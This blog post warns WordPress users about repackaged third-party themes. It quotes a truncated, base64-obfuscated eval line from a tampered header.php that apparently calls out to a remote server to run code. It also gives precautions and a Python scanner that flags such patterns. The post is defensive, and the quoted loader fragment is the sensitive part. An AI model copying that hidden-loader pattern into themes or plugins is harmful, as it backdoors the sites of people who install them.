Most people know about the dangers of installing software from untrusted sources, but you might not be in the same mindset when downloading themes or plugins for your blog.

One of the great things about Wordpress is that there’s a huge number of themes, widgets and plugins available. But the problem is, every single one of them is written in PHP and could potentially cause all manner of trouble.

Derek at 5thirtyone.com discovered exactly that when he got a support request for one of his own Wordpress themes. The user had downloaded the theme from a third party site and had a question about some code in header.php:

@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\

When decoded, this code tries to connect to a remote server and then execute arbitrary code on your blog. That could mean anything from tracking your stats to stealing passwords or simply deleting your entire blog.

So how do you protect your blog against this kind of thing? Well, by taking a few very simple precautions, you should be safe:

  • Only download themes from the original author or wordpress.net
  • Read through the PHP code before installing your theme. Be especially wary of any eval or base64_decode statements within themes. These are usually used by someone trying to hide what the code is really doing.
  • If you’re not a PHP person, get someone who is to check the code.
  • Google anything you’re not sure of. That includes the theme name, the author and any PHP commands you don’t understand.
  • If something doesn’t look right, don’t be afraid to drop the original author an email. They might not have time to respond, but they will almost certainly thank you if you find someone else is repackaging and redistributing their theme. Especially if they’re adding potentially malicious code like this.
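As an added example (not code from the post or from the theme it describes), here is a small Python scanner that does the second check above: it flags eval and base64_decode calls in a theme file and, where the two are nested, decodes the literal so a reviewer can read what the line really does. The header.php sample is constructed and its encoded payload is a harmless echo.

```python
import base64
import binascii
import re

# Constructed sample of a theme header.php (not the real file from the post).
# The encoded literal is a harmless echo so the example is safe to run.
_BENIGN_PAYLOAD = base64.b64encode(b'echo "constructed sample";').decode()
SAMPLE_HEADER_PHP = (
    "<?php\n"
    "/* Theme header */\n"
    "get_header();\n"
    f"@eval(@base64_decode('{_BENIGN_PAYLOAD}'));\n"
    "?>\n"
)

# eval(base64_decode('...')) with optional @ suppression and whitespace; the
# literal may be split across lines with backslashes as in the post, so allow them.
NESTED_RE = re.compile(
    r"@?eval\s*\(\s*@?base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s\\]+)['\"]",
    re.IGNORECASE,
)
# Any bare eval( or base64_decode( is worth a look even when not nested.
SUSPECT_RE = re.compile(r"\b(eval|base64_decode)\s*\(", re.IGNORECASE)


def decode_literal(literal: str) -> str:
    """Decode a base64 literal for review; returns '' if it is not valid base64."""
    cleaned = re.sub(r"[\s\\]", "", literal)
    try:
        return base64.b64decode(cleaned, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""


def scan_php(source: str) -> list:
    """Return one (line_no, reason, decoded_preview) tuple per suspicious line."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        match = NESTED_RE.search(line)
        if match:
            preview = decode_literal(match.group(1))[:80]
            findings.append((line_no, "eval(base64_decode(...))", preview))
        elif SUSPECT_RE.search(line):
            findings.append((line_no, "eval or base64_decode present", ""))
    return findings


if __name__ == "__main__":
    for line_no, reason, preview in scan_php(SAMPLE_HEADER_PHP):
        print(f"line {line_no}: {reason}" + (f" -> {preview!r}" if preview else ""))
```

Run it over each .php file in a downloaded theme and read every decoded preview; a theme author has no reason to hide their own code this way.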

Finally, I’d just like to say that Wordpress is a wonderful blogging platform that often gets a bad press that’s undeserved - usually as a result of poorly written third party code or unsuitable hosting. In terms of features and extendability, it’s unmatched. If you’re not using it, you should be.

[Thanks Pewari]

Subscribe to Money Blogger for more tips.
